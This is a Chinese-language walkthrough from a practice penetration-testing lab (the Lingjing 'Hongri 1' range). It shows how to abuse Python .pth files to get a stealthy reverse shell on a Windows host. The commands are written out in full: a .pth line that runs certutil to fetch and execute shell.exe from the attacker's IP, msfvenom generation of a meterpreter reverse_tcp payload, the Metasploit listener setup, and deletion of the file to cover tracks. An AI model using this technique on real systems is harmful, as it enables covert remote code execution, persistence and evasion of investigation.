漏洞详细及linux利用参考下方文章https://mp.weixin.qq.com/s?src11×tamp1775124137ver6636signature3Gd5vhsVR3CvDDA8Y3gv3QvLaFDfin2l9gvLvC5GztRyWxfguB3vfygDMLSiLP9XsuM4OC4PR6PcqVizTfmr-FPqhCVybueoqx8Oq-hoUD1scBK-dy1JUEHakRxxYiqLnew1https://mp.weixin.qq.com/s?src11×tamp1775124137ver6636signature3Gd5vhsVR3CvDDA8Y3gv3QvLaFDfin2l9gvLvC5GztRyWxfguB3vfygDMLSiLP9XsuM4OC4PR6PcqVizTfmr-FPqhCVybueoqx8Oq-hoUD1scBK-dy1JUEHakRxxYiqLnew1本次测试采用Lingjing(灵境)平台的红日1进行实战反弹shell进入第一台机器的教程可以看红日1通关教程https://blog.csdn.net/2301_78519654/article/details/154876055?spm1011.2415.3001.5331在进入第一台机器之后我们使用这个新的python的官方特性的.pth文件进行反弹shell来建立稳定会话通过蚁剑的终端执行下方命令来验证系统是否存在python环境python -V有输出python的版本号就是有python环境下面开始利用执行命令查看.pth文件的所在目录python -c import site; print(site.getsitepackages())开始上传shell这里也可以上传nc或者直接使用powershell反弹shell之后再用python升级交互式shell这里由于蚁剑的终端语法识别问题所以采用.bat文件执行下方命令来写入到pth文件,如果没有的话会自动创建(不用python版本的.pth文件名不同但是都在安装目录的site-packages下)echo import os; os.system(certutil -urlcache -split -f http://192.168.188.102/shell.exe shell.exe shell.exe) C:\Python27\lib\site-packages\setuptools-compat.pth这里因为老版本的windows的自带工具似乎下载不了通过python搭建的http服务器所以这里用的是kali的nginx服务里面的ip是攻击机的ip,使用msf生成反向马msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST192.168.188.102 LPORT4444 -f exe -o shell.exe开启监听use exploit/multi/handler set payload windows/x64/meterpreter/reverse_tcp set lhost 192.168.188.102 set lport 4444 run监听开启后在蚁剑的终端中随意执行python的语句即可触发下载并运行等待1分钟左右马子就会上线(由于红1的第一台机器没有杀软所以没有做免杀做了免杀之后的马子体积过大的话建议使用分块传输)例如执行python -c print(123past)删除痕迹del C:\Python27\lib\site-packages\setuptools-compat.pth总结该特性较为冷门隐蔽性强利用方式简单且范围为全用户影响的版本也非常的广剩下的渗透过程请移步至下方链接的文章观看红日1通关教程https://blog.csdn.net/2301_78519654/article/details/154876055?spm1011.2415.3001.5331